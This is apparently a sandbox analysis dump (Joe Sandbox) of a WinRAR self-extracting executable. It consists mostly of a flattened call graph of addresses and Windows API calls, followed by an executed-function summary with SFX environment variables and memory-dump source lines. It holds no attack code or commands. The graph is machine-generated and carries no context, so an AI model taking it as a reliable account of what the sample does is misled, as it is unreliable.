e9912d 20323->20233 20324 e9b7c6 20325->20323 20325->20324 20326 e9b7a0 20325->20326 20341 e9a1bf __vswprintf_c_l 20339->20341 20340 e9a1ee 20340->20288 20341->20340 20374 e9db36 20341->20374 20344 e9a3f5 20343->20344 20351 e9a38a __vsnwprintf_l 20347->20351 20354 e9a23c __vsnwprintf_l 20353->20354 20355 e9da7d __dosmaperr 20 API calls 20354->20355 20358 e9a266 __vsnwprintf_l 20354->20358 20356 e9a25b 20355->20356 20357 e9d95c ___std_exception_copy 26 API calls 20356->20357 20357->20358 20358->20288 20360 e99fad 20359->20360 20386 e98acc 20360->20386 20368 e9a22b __vsnwprintf_l 26 API calls 20367->20368 20369 e9a41f 20368->20369 20369->20288 20371 e9a6f0 __vswprintf_c_l 20370->20371 20372 e9a6a2 __vswprintf_c_l 20370->20372 20371->20289 20372->20371 20373 e9db36 __fassign 40 API calls 20372->20373 20373->20372 20375 e9db53 20374->20375 20376 e9db47 20374->20376 20375->20340 20376->20375 20387 e98ae8 20386->20387 20388 e98af7 20386->20388 20486 e8f804 4 API calls 20485->20486 20487 e8f7ed 20486->20487 20488 e8f7f9 20487->20488 20489 e8f825 4 API calls 20487->20489 20488->20025 20488->20026 20488->20027 20489->20488 20491 e8f9f3 20490->20491 20492 e8f905 SizeofResource 20490->20492 20491->20018 20491->20023 20492->20491 20493 e8f91c LoadResource 20492->20493 20493->20491 20494 e8f931 LockResource 20493->20494 20494->20491 20495 e8f942 GlobalAlloc 20494->20495 20495->20491 20496 e8f95d GlobalLock 20495->20496 20497 e8f9ec GlobalFree 20496->20497 20498 e8f96c __InternalCxxFrameHandler 20496->20498 20497->20491 20499 e8f974 CreateStreamOnHGlobal 20498->20499 20500 e8f98c 20499->20500 20501 e8f9e5 GlobalUnlock 20499->20501 20523 e8f846 GdipAlloc 20500->20523 20501->20497 20507 e8f833 20506->20507 20508 e8f82e 20506->20508 20510 e8f804 20507->20510 20531 e8f883 GetDC 20508->20531 20511 e8f80d 20510->20511 20512 e8f812 20510->20512 20513 e8f883 4 API calls 20511->20513 20514 e8fa2c 20512->20514 20513->20512 20524 e8f858 20523->20524 20525 e8f865 20523->20525 20525->20501 20532 e8f892 GetDeviceCaps GetDeviceCaps ReleaseDC 20531->20532 20533 e8f8b7 20531->20533 20532->20533 20533->20507 20541 e840d5 _wcschr __EH_prolog 20540->20541 20542 e84104 GetModuleFileNameW 20541->20542 20543 e84135 20541->20543 20544 e8411e 20542->20544 20586 e81e20 20543->20586 20544->20543 20871 e85986 _wcslen 20870->20871 20872 e8596f _abort 20870->20872 20874 e85869 20871->20874 20872->20056 20875 e8587a __InternalCxxFrameHandler 20874->20875 20878 e858aa 20875->20878 20877 e858a4 20877->20872 20879 e858c2 20878->20879 20880 e858b8 20878->20880 20882 e85937 GetCurrentProcessId 20879->20882 20883 e858dc 20879->20883 20888 e8582b 20880->20888 20887 e85908 20882->20887 20884 e81799 76 API calls 20883->20884 20883->20887 20885 e858ff 20884->20885 20886 e8193c 76 API calls 20885->20886 20886->20887 20887->20877 20889 e85834 20888->20889 20890 e85863 20888->20890 20891 e86b47 2 API calls 20889->20891 20890->20879 20892 e8583e 20891->20892 20892->20890 20893 e85844 GetProcAddress GetProcAddress 20892->20893 20893->20890 20895 e9c626 _abort 20894->20895 20896 e9c62d 20895->20896 20897 e9c63f 20895->20897 20933 e9c774 GetModuleHandleW 20896->20933 20918 e9f5b1 EnterCriticalSection 20897->20918 20900 e9c6e4 20922 e9c724 20900->20922 20905 e9c6bb 20910 e9c6d3 20905->20910 20915 e9d3e1 _abort 5 API calls 20905->20915 20907 e9c646 20907->20900 20907->20905 20919 e9d130 20907->20919 20908 e9c72d 20914 ea6d20 _abort 5 API calls 20908->20914 20909 e9c701 20925 e9c733 20909->20925 20911 e9d3e1 _abort 5 API calls 20910->20911 20911->20900 20917 e94215 20914->20917 20915->20910 20917->19300 20918->20907 20943 e9ce69 20919->20943 20965 e9f601 LeaveCriticalSection 20922->20965 20924 e9c6fd 20924->20908 20924->20909 20966 e9f9f6 20925->20966 20928 e9c761 20931 e9c7b8 _abort 8 API calls 20928->20931 20929 e9c741 GetPEB 20929->20928 20930 e9c751 GetCurrentProcess TerminateProcess 20929->20930 20930->20928 20932 e9c769 ExitProcess 20931->20932 20934 e9c632 20933->20934 20934->20897 20935 e9c7b8 GetModuleHandleExW 20934->20935 20936 e9c7e2 GetProcAddress 20935->20936 20937 e9c805 20935->20937 20941 e9c7f7 20936->20941 20938 e9c80b FreeLibrary 20937->20938 20939 e9c814 20937->20939 20938->20939 20940 e9494c _ValidateLocalCookies 5 API calls 20939->20940 20942 e9c63e 20940->20942 20941->20937 20942->20897 20946 e9ce18 20943->20946 20945 e9ce8d 20945->20905 20947 e9ce24 __FrameHandler3::FrameUnwindToState 20946->20947 20954 e9f5b1 EnterCriticalSection 20947->20954 20949 e9ce32 20955 e9ceb9 20949->20955 20953 e9ce50 _abort 20953->20945 20954->20949 20958 e9cee1 20955->20958 20959 e9ced9 20955->20959 20956 e9494c _ValidateLocalCookies 5 API calls 20957 e9ce3f 20956->20957 20961 e9ce5d 20957->20961 20958->20959 20960 e9d758 _free 20 API calls 20958->20960 20959->20956 20960->20959 20964 e9f601 LeaveCriticalSection 20961->20964 20963 e9ce67 20963->20953 20964->20963 20965->20924 20967 e9fa1b 20966->20967 20968 e9fa11 20966->20968 20969 e9f618 _abort 5 API calls 20967->20969 20970 e9494c _ValidateLocalCookies 5 API calls 20968->20970 20969->20968 20971 e9c73d 20970->20971 20971->20928 20971->20929 21050 e857be 21051 e857ce 21050->21051 21052 e857c6 FreeLibrary 21050->21052 21052->21051 22142 ea04b0 22143 ea04c2 22142->22143 22144 ea04b9 22142->22144 22145 ea03a7 51 API calls 22144->22145 22145->22143 21053 e92e9e 21054 e92eab 21053->21054 21055 e84c77 53 API calls 21054->21055 21056 e92eb8 21055->21056 21057 e839a9 _swprintf 51 API calls 21056->21057 21058 e92ecd SetDlgItemTextW 21057->21058 21059 e905a8 5 API calls 21058->21059 21060 e92eea 21059->21060 22149 e91d96 22150 e91e60 22149->22150 22156 e91db9 _wcschr 22149->22156 22164 e917d1 _wcslen _wcsrchr 22150->22164 22177 e927cf 22150->22177 22151 e90354 ExpandEnvironmentStringsW 22151->22164 22153 e92448 22155 e87d24 CompareStringW 22155->22156 22156->22150 22156->22155 22157 e91aa5 SetWindowTextW 22157->22164 22159 e904ce 76 API calls 22159->22164 22160 e82a2f 6 API calls 22160->22164 22161 e91893 SetFileAttributesW 22163 e9194d GetFileAttributesW 22161->22163 22174 e918ad _abort _wcslen 22161->22174 22162 e829b8 FindClose 22162->22164 22163->22164 22166 e9195f DeleteFileW 22163->22166 22164->22151 22164->22153 22164->22157 22164->22159 22164->22160 22164->22161 22164->22162 22167 e91c6f GetDlgItem SetWindowTextW SendMessageW 22164->22167 22171 e91caf SendMessageW 22164->22171 22176 e87d24 CompareStringW 22164->22176 22202 e8f86d GetCurrentDirectoryW 22164->22202 22165 e83470 51 API calls 22165->22174 22166->22164 22168 e91970 22166->22168 22167->22164 22169 e839a9 _swprintf 51 API calls 22168->22169 22170 e91990 GetFileAttributesW 22169->22170 22170->22168 22172 e919a5 MoveFileW 22170->22172 22171->22164 22172->22164 22173 e919bd MoveFileExW 22172->22173 22173->22164 22174->22164 22174->22165 22175 e91929 SHFileOperationW 22174->22175 22175->22163 22176->22164 22179 e927d9 _abort _wcslen 22177->22179 22178 e92a27 22178->22164 22179->22178 22180 e92a00 22179->22180 22186 e928e5 22179->22186 22203 e87d24 CompareStringW 22179->22203 22180->22178 22184 e92a1e ShowWindow 22180->22184 22182 e82680 3 API calls 22183 e928fa 22182->22183 22185 e92919 ShellExecuteExW 22183->22185 22204 e831a3 22183->22204 22184->22178 22185->22178 22188 e9292c 22185->22188 22186->22182 22190 e92950 IsWindowVisible 22188->22190 22191 e92965 WaitForInputIdle 22188->22191 22192 e929bb CloseHandle 22188->22192 22189 e92911 22189->22185 22190->22191 22193 e9295b ShowWindow 22190->22193 22194 e92c53 6 API calls 22191->22194 22195 e929c9 22192->22195 22196 e929d4 22192->22196 22193->22191 22197 e9297d 22194->22197 22212 e87d24 CompareStringW 22195->22212 22196->22180 22197->22192 22199 e92990 GetExitCodeProcess 22197->22199 22199->22192 22200 e929a3 22199->22200 22200->22192 22202->22164 22203->22186 22205 e831b0 22204->22205 22206 e831c0 GetFullPathNameW 22205->22206 22208 e8320f 22205->22208 22207 e831de 22206->22207 22207->22208 22209 e83553 GetCurrentDirectoryW 22207->22209 22208->22189 22210 e831f0 22209->22210 22210->22208 22211 e831f4 GetFullPathNameW 22210->22211 22211->22208 22212->22196 22101 e9f570 22102 e9f57b 22101->22102 22103 e9f88a 11 API calls 22102->22103 22104 e9f5a4 22102->22104 22105 e9f5a0 22102->22105 22103->22102 22107 e9f5d0 22104->22107 22108 e9f5fc 22107->22108 22109 e9f5dd 22107->22109 22108->22105 22110 e9f5e7 DeleteCriticalSection 22109->22110 22110->22108 22110->22110 20979 e93a42 20980 e93a4c 20979->20980 20981 e937b8 ___delayLoadHelper2@8 17 API calls 20980->20981 20982 e93a59 20981->20982 21064 e90830 21065 e9083a __EH_prolog 21064->21065 21234 e811e6 21065->21234 21068 e90891 21069 e9087a 21069->21068 21072 e90888 21069->21072 21073 e908eb 21069->21073 21070 e90f5f 21301 e926de 21070->21301 21076 e908c8 21072->21076 21077 e9088c 21072->21077 21075 e9097e GetDlgItemTextW 21073->21075 21081 e90901 21073->21081 21075->21076 21080 e909bb 21075->21080 21076->21068 21084 e909af EndDialog 21076->21084 21077->21068 21087 e84c77 53 API calls 21077->21087 21078 e90f88 21082 e90f91 SendDlgItemMessageW 21078->21082 21083 e90fa2 GetDlgItem SendMessageW 21078->21083 21079 e90f7a SendMessageW 21079->21078 21085 e909d0 GetDlgItem 21080->21085 21232 e909c4 21080->21232 21086 e84c77 53 API calls 21081->21086 21082->21083 21319 e8f86d GetCurrentDirectoryW 21083->21319 21084->21068 21089 e909e4 SendMessageW SendMessageW 21085->21089 21090 e90a07 SetFocus 21085->21090 21091 e9091e SetDlgItemTextW 21086->21091 21092 e908ab 21087->21092 21089->21090 21094 e90a17 21090->21094 21107 e90a30 21090->21107 21095 e90929 21091->21095 21331 e81120 SHGetMalloc 21092->21331 21093 e90fd2 GetDlgItem 21097 e90fef 21093->21097 21098 e90ff5 SetWindowTextW 21093->21098 21100 e84c77 53 API calls 21094->21100 21095->21068 21105 e90936 GetMessageW 21095->21105 21097->21098 21320 e8fdcb GetClassNameW 21098->21320 21106 e90a21 21100->21106 21101 e90ea5 21103 e84c77 53 API calls 21101->21103 21102 e908b2 21102->21068 21109 e91241 SetDlgItemTextW 21102->21109 21108 e90eb5 SetDlgItemTextW 21103->21108 21105->21068 21111 e9094d IsDialogMessageW 21105->21111 21112 e92512 16 API calls 21106->21112 21116 e84c77 53 API calls 21107->21116 21113 e90ec9 21108->21113 21109->21068 21111->21095 21115 e9095c TranslateMessage DispatchMessageW 21111->21115 21125 e90a29 21112->21125 21119 e84c77 53 API calls 21113->21119 21114 e9101e 21117 e91035 21114->21117 21120 e9177d 97 API calls 21114->21120 21115->21095 21118 e90a67 21116->21118 21121 e91065 21117->21121 21124 e84c77 53 API calls 21117->21124 21122 e839a9 _swprintf 51 API calls 21118->21122 21123 e90eec _wcslen 21119->21123 21120->21117 21127 e9111d 21121->21127 21132 e9177d 97 API calls 21121->21132 21129 e90a79 21122->21129 21164 e84c77 53 API calls 21123->21164 21180 e90f3d 21123->21180 21130 e91048 SetDlgItemTextW 21124->21130 21244 e82551 21125->21244 21128 e911d0 21127->21128 21160 e911ae 21127->21160 21178 e84c77 53 API calls 21127->21178 21134 e911d9 EnableWindow 21128->21134 21135 e911e2 21128->21135 21136 e92512 16 API calls 21129->21136 21137 e84c77 53 API calls 21130->21137 21133 e91080 21132->21133 21142 e91092 21133->21142 21157 e910b7 21133->21157 21134->21135 21147 e911ff 21135->21147 21349 e811a3 GetDlgItem KiUserCallbackDispatcher 21135->21349 21136->21125 21141 e9105c SetDlgItemTextW 21137->21141 21138 e90ab8 GetLastError 21139 e90ac3 21138->21139 21250 e8fe24 SetCurrentDirectoryW 21139->21250 21141->21121 21334 e8f0f5 ShowWindow 21142->21334 21143 e84c77 53 API calls 21143->21068 21144 e90ad7 21151 e90aee 21144->21151 21152 e90ae0 GetLastError 21144->21152 21145 e91110 21149 e9177d 97 API calls 21145->21149 21148 e91226 21147->21148 21159 e9121e SendMessageW 21147->21159 21148->21068 21155 e84c77 53 API calls 21148->21155 21149->21127 21156 e90b61 21151->21156 21161 e90b70 21151->21161 21163 e90afe GetTickCount 21151->21163 21152->21151 21153 e911f5 21350 e811a3 GetDlgItem KiUserCallbackDispatcher 21153->21350 21154 e910ab 21154->21157 21155->21102 21156->21161 21162 e90da6 21156->21162 21157->21145 21175 e9177d 97 API calls 21157->21175 21159->21148 21165 e8f0f5 32 API calls 21160->21165 21166 e90d4b 21161->21166 21167 e90b89 GetModuleFileNameW 21161->21167 21168 e90d41 21161->21168 21265 e811c1 GetDlgItem ShowWindow 21162->21265 21170 e839a9 _swprintf 51 API calls 21163->21170 21171 e90f20 21164->21171 21172 e911cd 21165->21172 21174 e84c77 53 API calls 21166->21174 21259 e857f2 21167->21259 21168->21076 21168->21166 21177 e90b17 21170->21177 21179 e839a9 _swprintf 51 API calls 21171->21179 21172->21128 21182 e90d55 21174->21182 21183 e910e5 21175->21183 21176 e90db6 21266 e811c1 GetDlgItem ShowWindow 21176->21266 21251 e81bbe 21177->21251 21178->21127 21179->21180 21180->21143 21186 e839a9 _swprintf 51 API calls 21182->21186 21183->21145 21187 e910ee DialogBoxParamW 21183->21187 21185 e839a9 _swprintf 51 API calls 21189 e90bd1 CreateFileMappingW 21185->21189 21190 e90d73 21186->21190 21187->21076 21187->21145 21188 e90dc0 21191 e84c77 53 API calls 21188->21191 21193 e90c33 GetCommandLineW 21189->21193 21228 e90cb0 __InternalCxxFrameHandler 21189->21228 21202 e84c77 53 API calls 21190->21202 21194 e90dca SetDlgItemTextW 21191->21194 21196 e90c44 21193->21196 21267 e811c1 GetDlgItem ShowWindow 21194->21267 21195 e90b3d 21199 e90b4f 21195->21199 21200 e90b44 GetLastError 21195->21200 21263 e90465 SHGetMalloc 21196->21263 21198 e90cbb ShellExecuteExW 21213 e90cd8 21198->21213 21201 e81aec 80 API calls 21199->21201 21200->21199 21201->21156 21205 e90d8d 21202->21205 21204 e90ddc SetDlgItemTextW GetDlgItem 21207 e90df9 GetWindowLongW SetWindowLongW 21204->21207 21208 e90e11 21204->21208 21207->21208 21268 e9177d 21208->21268 21209 e90465 SHGetMalloc 21211 e90c6c 21209->21211 21217 e90465 SHGetMalloc 21211->21217 21215 e90ced WaitForInputIdle 21213->21215 21216 e90d1b 21213->21216 21214 e9177d 97 API calls 21218 e90e2d 21214->21218 21219 e90d02 21215->21219 21216->21168 21223 e90d31 UnmapViewOfFile CloseHandle 21216->21223 21220 e90c78 21217->21220 21293 e92a92 21218->21293 21219->21216 21222 e90d07 Sleep 21219->21222 21224 e85960 81 API calls 21220->21224 21222->21216 21222->21219 21223->21168 21226 e90c8f MapViewOfFile 21224->21226 21226->21228 21227 e9177d 97 API calls 21231 e90e53 21227->21231 21228->21198 21229 e90e7c 21333 e811a3 GetDlgItem KiUserCallbackDispatcher 21229->21333 21231->21229 21233 e9177d 97 API calls 21231->21233 21232->21076 21232->21101 21233->21229 21235 e81248 21234->21235 21236 e811ef 21234->21236 21373 e84921 21235->21373 21237 e81255 21236->21237 21351 e84948 21236->21351 21237->21068 21237->21069 21237->21070 21241 e81224 GetDlgItem 21241->21237 21242 e81234 21241->21242 21242->21237 21243 e8123a SetWindowTextW 21242->21243 21243->21237 21247 e8255b 21244->21247 21245 e825ec 21246 e82710 8 API calls 21245->21246 21248 e82615 21245->21248 21246->21248 21247->21245 21247->21248 21386 e82710 21247->21386 21248->21138 21248->21139 21250->21144 21252 e81bc8 21251->21252 21253 e81c25 CreateFileW 21252->21253 21254 e81c19 21252->21254 21253->21254 21255 e81c6f 21254->21255 21256 e83553 GetCurrentDirectoryW 21254->21256 21255->21195 21257 e81c54 21256->21257 21257->21255 21258 e81c58 CreateFileW 21257->21258 21258->21255 21260 e857fb 21259->21260 21261 e85814 21259->21261 21262 e85869 81 API calls 21260->21262 21261->21185 21262->21261 21264 e90487 21263->21264 21264->21209 21265->21176 21266->21188 21267->21204 21269 e91787 __EH_prolog 21268->21269 21270 e90e1f 21269->21270 21271 e90354 ExpandEnvironmentStringsW 21269->21271 21270->21214 21281 e917be _wcslen _wcsrchr 21271->21281 21273 e90354 ExpandEnvironmentStringsW 21273->21281 21274 e91aa5 SetWindowTextW 21274->21281 21276 e904ce 76 API calls 21276->21281 21277 e82a2f 6 API calls 21277->21281 21278 e91893 SetFileAttributesW 21280 e9194d GetFileAttributesW 21278->21280 21291 e918ad _abort _wcslen 21278->21291 21279 e829b8 FindClose 21279->21281 21280->21281 21283 e9195f DeleteFileW 21280->21283 21281->21270 21281->21273 21281->21274 21281->21276 21281->21277 21281->21278 21281->21279 21284 e91c6f GetDlgItem SetWindowTextW SendMessageW 21281->21284 21288 e91caf SendMessageW 21281->21288 21407 e87d24 CompareStringW 21281->21407 21408 e8f86d GetCurrentDirectoryW 21281->21408 21282 e83470 51 API calls 21282->21291 21283->21281 21285 e91970 21283->21285 21284->21281 21286 e839a9 _swprintf 51 API calls 21285->21286 21287 e91990 GetFileAttributesW 21286->21287 21287->21285 21289 e919a5 MoveFileW 21287->21289 21288->21281 21289->21281 21290 e919bd MoveFileExW 21289->21290 21290->21281 21291->21281 21291->21282 21292 e91929 SHFileOperationW 21291->21292 21292->21280 21294 e92a9c __EH_prolog 21293->21294 21409 e869e4 21294->21409 21296 e92ac3 21413 e81328 21296->21413 21298 e92adf 21417 e8dc56 21298->21417 21300 e90e3e 21300->21227 21302 e926e8 21301->21302 21303 e8f7e6 4 API calls 21302->21303 21304 e926ed 21303->21304 21305 e926f5 GetWindow 21304->21305 21306 e90f65 21304->21306 21305->21306 21309 e92715 21305->21309 21306->21078 21306->21079 21307 e92722 GetClassNameW 22055 e87d24 CompareStringW 21307->22055 21309->21306 21309->21307 21310 e927aa GetWindow 21309->21310 21311 e92746 GetWindowLongW 21309->21311 21310->21306 21310->21309 21311->21310 21312 e92756 SendMessageW 21311->21312 21312->21310 21313 e9276c GetObjectW 21312->21313 21314 e8f825 4 API calls 21313->21314 21315 e92783 21314->21315 21316 e8f804 4 API calls 21315->21316 21317 e8fa2c 8 API calls 21315->21317 21316->21315 21318 e92794 SendMessageW DeleteObject 21317->21318 21318->21310 21319->21093 21321 e8fdec 21320->21321 21323 e8fe11 21320->21323 22056 e87d24 CompareStringW 21321->22056 21326 e8e108 21323->21326 21324 e8fdff 21324->21323 21325 e8fe03 FindWindowExW 21324->21325 21325->21323 22057 e8e0a6 21326->22057 21328 e8e125 21329 e878fd MultiByteToWideChar 21328->21329 21330 e8e15b 21328->21330 21329->21330 21330->21114 21332 e81138 21331->21332 21332->21102 21333->21232 21335 e8f11f 21334->21335 21336 e8f135 21335->21336 21337 e9bfa6 26 API calls 21335->21337 21338 e8f14d GetWindowRect 21336->21338 21340 e9bfa6 26 API calls 21336->21340 21337->21336 21341 e8f178 21338->21341 21340->21338 21342 e8f212 21341->21342 21345 e8f1da 21341->21345 21343 e8f20f 21342->21343 21344 e8f216 ShowWindow 21342->21344 21343->21154 21344->21343 21345->21343 22071 e8ef1e 21345->22071 21348 e8f1f8 ShowWindow SetWindowTextW 21348->21343 21349->21153 21350->21147 21352 e839a9 _swprintf 51 API calls 21351->21352 21353 e84973 21352->21353 21354 e87b46 WideCharToMultiByte 21353->21354 21359 e8498a _strlen 21354->21359 21355 e84a05 21376 e83e7c 21355->21376 21357 e84a1d GetWindowRect GetClientRect 21358 e84b41 GetSystemMetrics GetWindow 21357->21358 21363 e84a75 21357->21363 21361 e81211 21358->21361 21372 e84b62 21358->21372 21359->21355 21365 e84050 26 API calls 21359->21365 21370 e849e4 SetDlgItemTextW 21359->21370 21360 e84b0c 21379 e83efc 21360->21379 21361->21237 21361->21241 21363->21360 21364 e84ad2 GetWindowLongW 21363->21364 21369 e84afc GetWindowRect 21364->21369 21365->21359 21367 e84b75 GetWindowRect 21371 e84bea GetWindow 21367->21371 21368 e84b32 SetWindowTextW 21368->21358 21369->21360 21370->21359 21371->21361 21371->21372 21372->21361 21372->21367 21374 e84945 21373->21374 21375 e84927 GetWindowLongW SetWindowLongW 21373->21375 21374->21237 21375->21374 21377 e83efc 52 API calls 21376->21377 21378 e83e9f _wcschr 21377->21378 21378->21357 21380 e839a9 _swprintf 51 API calls 21379->21380 21381 e83f21 21380->21381 21382 e87b46 WideCharToMultiByte 21381->21382 21383 e83f36 21382->21383 21384 e84050 26 API calls 21383->21384 21385 e83f47 21384->21385 21385->21358 21385->21368 21387 e8271d 21386->21387 21388 e82741 21387->21388 21389 e82734 CreateDirectoryW 21387->21389 21390 e82680 3 API calls 21388->21390 21389->21388 21392 e82774 21389->21392 21391 e82747 21390->21391 21393 e82787 GetLastError 21391->21393 21395 e83553 GetCurrentDirectoryW 21391->21395 21394 e82783 21392->21394 21399 e8294b 21392->21399 21393->21394 21394->21247 21397 e8275d 21395->21397 21397->21393 21398 e82761 CreateDirectoryW 21397->21398 21398->21392 21398->21393 21400 e93ac0 21399->21400 21401 e82958 SetFileAttributesW 21400->21401 21402 e8299b 21401->21402 21403 e8296e 21401->21403 21402->21394 21404 e83553 GetCurrentDirectoryW 21403->21404 21405 e82982 21404->21405 21405->21402 21406 e82986 SetFileAttributesW 21405->21406 21406->21402 21407->21281 21408->21281 21410 e869f1 _wcslen 21409->21410 21423 e86924 21410->21423 21412 e86a09 21412->21296 21414 e869e4 _wcslen 21413->21414 21415 e86924 77 API calls 21414->21415 21416 e86a09 21415->21416 21416->21298 21418 e8dc60 _abort __EH_prolog 21417->21418 21434 e8ddda 21418->21434 21420 e8dc86 21422 e8dc8a 21420->21422 21439 e8bf90 21420->21439 21422->21300 21424 e8693a 21423->21424 21433 e86995 __InternalCxxFrameHandler 21423->21433 21425 e86963 21424->21425 21426 e81799 76 API calls 21424->21426 21429 e869c2 21425->21429 21430 e86982 ___std_exception_copy 21425->21430 21427 e86959 21426->21427 21428 e8180a 75 API calls 21427->21428 21428->21425 21431 e8180a 75 API calls 21429->21431 21429->21433 21432 e8180a 75 API calls 21430->21432 21430->21433 21431->21433 21432->21433 21433->21412 21435 e8dde4 ___std_exception_copy 21434->21435 21436 e8de0e 21435->21436 21437 e8181d 74 API calls 21435->21437 21436->21420 21438 e8de26 21437->21438 21438->21420 21440 e8bf9a 21439->21440 21460 e8c8f9 21440->21460 21443 e8bfbc 21446 e8bfd3 21443->21446 21553 e816ef 21443->21553 21444 e8bfae 21546 e81844 21444->21546 21448 e8bfba 21446->21448 21451 e8c075 21446->21451 21482 e880e5 21446->21482 21487 e829cb 21446->21487 21448->21422 21493 e8a4a5 21451->21493 21461 e8c903 21460->21461 21462 e829cb 7 API calls 21461->21462 21463 e8c922 21462->21463 21479 e8bfa2 21463->21479 21556 e8a127 21463->21556 21479->21443 21479->21444 21483 e880ab 2 API calls 21482->21483 21488 e829e0 21487->21488 21489 e82a0e 21488->21489 21680 e82af9 21488->21680 21489->21446 22052 e87134 21546->22052 21554 e81634 74 API calls 21553->21554 21555 e816fd 21554->21555 21555->21446 21557 e8a131 __EH_prolog 21556->21557 21558 e93b21 8 API calls 21557->21558 21559 e8a13f 21558->21559 21560 e8a194 21559->21560 21589 e8186f 21559->21589 22054 e8713b 22052->22054 22055->21309 22056->21324 22058 e8e0b0 __EH_prolog 22057->22058 22059 e81e20 6 API calls 22058->22059 22060 e8e0d9 22059->22060 22061 e8e0ef 22060->22061 22065 e8df72 22060->22065 22063 e81aec 80 API calls 22061->22063 22064 e8e0fa 22063->22064 22064->21328 22067 e8df81 22065->22067 22066 e8e010 __InternalCxxFrameHandler 22066->22061 22067->22066 22068 e81d6a 79 API calls 22067->22068 22069 e8dfa3 22068->22069 22069->22066 22070 e81634 74 API calls 22069->22070 22070->22066 22074 e8ef2f _wcslen ___std_exception_copy 22071->22074 22072 e8f0e3 22072->21343 22072->21348 22073 e87d46 CompareStringW 22073->22074 22074->22072 22074->22073 22111 ea0933 22112 ea093e 22111->22112 22113 ea0957 22112->22113 22114 ea0966 22112->22114 22116 e9da7d __dosmaperr 20 API calls 22113->22116 22115 ea0975 22114->22115 22132 ea3b8f 22114->22132 22120 e9f087 22115->22120 22119 ea095c _abort 22116->22119 22121 e9f09f 22120->22121 22122 e9f094 22120->22122 22124 e9f0a7 22121->22124 22130 e9f0b0 _abort 22121->22130 22123 e9da90 __vsnwprintf_l 21 API calls 22122->22123 22129 e9f09c 22123->22129 22127 e9d758 _free 20 API calls 22124->22127 22125 e9f0da HeapReAlloc 22125->22129 22125->22130 22126 e9f0b5 22128 e9da7d __dosmaperr 20 API calls 22126->22128 22127->22129 22128->22129 22129->22119 22130->22125 22130->22126 22131 e9c3df _abort 7 API calls 22130->22131 22131->22130 22133 ea3b9a 22132->22133 22134 ea3baf HeapSize 22132->22134 22135 e9da7d __dosmaperr 20 API calls 22133->22135 22134->22115 22136 ea3b9f 22135->22136 22137 e9d95c ___std_exception_copy 26 API calls 22136->22137 22138 ea3baa 22137->22138 22138->22115 22075 e9e210 22083 e9f72f 22075->22083 22077 e9e224 22079 e9e189 _abort 20 API calls 22080 e9e22c 22079->22080 22081 e9e239 22080->22081 22090 e9e240 22080->22090 22084 e9f618 _abort 5 API calls 22083->22084 22085 e9f756 22084->22085 22086 e9f76e TlsAlloc 22085->22086 22087 e9f75f 22085->22087 22086->22087 22088 e9494c _ValidateLocalCookies 5 API calls 22087->22088 22089 e9e21a 22088->22089 22089->22077 22089->22079 22091 e9e24a 22090->22091 22092 e9e250 22090->22092 22094 e9f785 22091->22094 22092->22077 22095 e9f618 _abort 5 API calls 22094->22095 22096 e9f7ac 22095->22096 22097 e9f7c4 TlsFree 22096->22097 22100 e9f7b8 22096->22100 22097->22100 22098 e9494c _ValidateLocalCookies 5 API calls 22099 e9f7d5 22098->22099 22099->22092 22100->22098

                                                              Executed Functions

                                                              Function 00E92EF8 Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 195filesleeptimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00E86B8F: GetModuleHandleW.KERNEL32(kernel32), ref: 00E86BA8
                                                                • Part of subcall function 00E86B8F: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E86BBA
                                                                • Part of subcall function 00E86B8F: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E86BEB
                                                                • Part of subcall function 00E8F86D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E8F875
                                                                • Part of subcall function 00E8FE36: OleInitialize.OLE32(00000000), ref: 00E8FE4F
                                                                • Part of subcall function 00E8FE36: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E8FE86
                                                                • Part of subcall function 00E8FE36: SHGetMalloc.SHELL32(00ECEA00), ref: 00E8FE90
                                                              • GetCommandLineW.KERNEL32 ref: 00E92F36
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E92F5D
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E92F6E
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00E92FA8
                                                                • Part of subcall function 00E92BF6: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E92C0C
                                                                • Part of subcall function 00E92BF6: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E92C48
                                                              • CloseHandle.KERNEL32(00000000), ref: 00E92FB1
                                                              • GetModuleFileNameW.KERNEL32(00000000,00EE52D8,00000800), ref: 00E92FCC
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00EE52D8), ref: 00E92FD8
                                                              • GetLocalTime.KERNEL32(?), ref: 00E92FE3
                                                              • _swprintf.LIBCMT ref: 00E93022
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E93034
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00E9303B
                                                              • LoadIconW.USER32(00000000,00000064), ref: 00E93052
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00010830,00000000), ref: 00E930A3
                                                              • Sleep.KERNEL32(?), ref: 00E930D1
                                                              • DeleteObject.GDI32 ref: 00E9310A
                                                              • DeleteObject.GDI32(?), ref: 00E9311A
                                                              • CloseHandle.KERNEL32 ref: 00E9315D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
